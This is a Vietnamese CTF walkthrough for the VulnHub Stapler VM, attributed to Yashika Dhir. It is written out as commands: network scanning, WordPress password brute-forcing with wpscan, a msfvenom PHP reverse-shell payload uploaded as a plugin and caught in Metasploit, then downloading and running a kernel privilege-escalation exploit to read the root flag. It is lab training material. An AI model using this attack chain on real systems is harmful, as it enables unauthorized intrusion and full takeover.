CEHack Stapler VM (Thử thách CTF)

Trong bài viết này, chúng ta sẽ thử tấn công và chiếm quyền root đối với Stapler: 1 thử thách từ VulnHub. Mục tiêu là do thám, liệt kê và khai thác máy dễ bị tổn thương này để có quyền truy cập root và đọc nội dung của flag.txt. Chúng tôi đã được thông báo rằng có nhiều phương pháp khác nhau để làm như vậy nhưng chúng tôi đã thử và tìm ra cách đơn giản nhất.

Tải xuống máy dập ghim VM từ đây

Penetrating Methodology:

• Network Scanning (Nmap, netdiscover)
• Enumeration (robot.txt)
• WordPress scanning & password cracking (wpscan)
• Login into WordPress
• Generate PHP Backdoor (Msfvenom)
• Upload and execute a backdoor
• Reverse connection (Metasploit)
• Import python one-liner for proper TTY shell
• Kernel privilege escalation
• Get Root access and capture the flag.

Start off with scanning the network to find our target

Bắt đầu với việc quét mạng để tìm mục tiêu của chúng tôi. Và tất cả chúng ta mệnh lệnh cho nó là:

netdiscover

Ta đã tìm thấy mục tiêu của mình -> 192.168.1.126

Để quét IP mục tiêu sẽ sử dụng quét tích cực (-A)

nmap -p- -A 192.168.1.126

Kết quả sẽ cho thấy rằng cổng số 21, 22, 53, 80, 137, 139 và rất nhiều cổng khác đang mở.

Đồng thời cho biết về robot.txt và 2 mục nhập không được phép, tức là /admin112233 và /blogblog . Sau đó, chúng tôi đã khám phá IP mục tiêu qua cổng 80 nhưng không tìm thấy gì ở đây.

Vì vậy, tôi đã thử mở nó trong trình duyệt với cổng 12380

… mở /blogblog/ nhưng ở đây cũng không tìm thấy manh mối nào cho bước tiếp theo.

Sau đó, tôi nghĩ đến việc khám phá https://192.168.1.126:12380/blogblog/ để mở một trang web mới như hình bên dưới. Nghiên cứu blog này, tôi đã xác định rằng blog được làm bằng Word Press. Bây giờ rõ ràng là sử dụng WPScan để biết tất cả về blog.

Để áp dụng wpscan, tôi đưa ra lệnh 3 trong 1 vì nó sẽ cho biết tất cả về chủ đề và trình cắm cũng như tên người dùng và lệnh là:

wpscan -u https://192.168.1.126/blogblog/ --enumerate at --enumerate ap --enumerate u --disable-tls-checks

Nó đã hiển thị tất cả tên người dùng để đăng nhập, bây giờ tôi chỉ cần một mật khẩu để đăng nhập vào WordPress.

Bằng cách thực hiện lệnh bên dưới, bạn sẽ nhận được mật khẩu cho John.

wpscan -u https://192.168.1.126/blogblog/ --username John --wordlist /usr/share/wordlists/rockyou.txt

Như bạn có thể thấy mật khẩu là “incrrect” đối với người dùng “john”; bây giờ hãy sử dụng các thông tin đăng nhập này để đăng nhập vào WordPress.

Khi chúng tôi đăng nhập, tất cả những gì chúng tôi phải làm bây giờ là tạo mã PHP để tải lên để khi mã thực thi, chúng tôi sẽ có phiên của nó. Để tạo loại mã này hãy chạy lệnh sau:

msfvenom -p php/meterpreter/reverse_tcp lhost-192.168.1.132 lport=4444 -f raw

Mặt khác, chạy multi/handler bên trong Metasploit framework.

Sao chép mã từ <?php tới die() và lưu vào tệp có phần mở rộng .php.

Bây giờ, khi chúng tôi đã đăng nhập, hãy chuyển đến tùy chọn plugin , sau đó chọn tùy chọn Add Plugins . Nhấp vào tùy chọn duyệt và chọn PHP mà bạn vừa lưu mã và nhấp vào OK.

Bây giờ, hãy chuyển đến thư mục tải lên và nhấp đúp vào shell.php mà bạn vừa tải lên.

Trong khi đó, hãy quay trở lại thiết bị đầu cuối Metasploit và đợi phiên làm việc của máy đo bằng cách khai thác trình xử lý đa năng.

msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.132
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit

Từ hình ảnh dưới đây, bạn có thể quan sát Meterpreter session 1 . Nhưng nhiệm vụ vẫn chưa kết thúc, chúng ta vẫn cần thâm nhập nhiều hơn để leo thang đặc quyền. Hãy chạy lệnh thêm:

sysinfo

Sau đó, để truy cập vỏ TTY thích hợp, tôi đã nhập tập lệnh một dòng python bằng cách nhập như sau:

shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a

Bây giờ ta biết rằng mục tiêu đang sử dụng Ubuntu 16.04 , vì vậy sẽ thử và tìm kiếm khai thác của nó trên exploit-db.com. Tìm kiếm của chúng ta thành công và thấy cách khai thác thích hợp của mình như được hiển thị bên dưới:

Bây giờ, ta cần đi vào tệp có thể ghi mong muốn :

cd /tmp

Và sau đó tải xuống khai thác:

wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

Khi tải xuống khai thác, các tệp zip được tải xuống và bây giờ giải nén nó như sau:

unzip 39772.zip

Mở tệp đã giải nén bằng cách gõ:

ls
cd 39772

Bây giờ ta có một tệp tar có tên là exploit.tar. Mở nó bằng lệnh sau:

tar -xvf exploit.tar

Hãy sử dụng lệnh ls để xem các thư mục.

cd ebpf_mapfd_doubleput_exploit
ls 
./compile.sh (will run the compile.sh)
./doubleput (will run the double.sh)

cd /root
ls
cat flag.txt

Lưu ý: Phòng thí nghiệm này có thể được giải quyết theo nhiều cách .

Tác giả : Yashika Dhir

CEH VIETNAM Biên soạn & Tổng hợp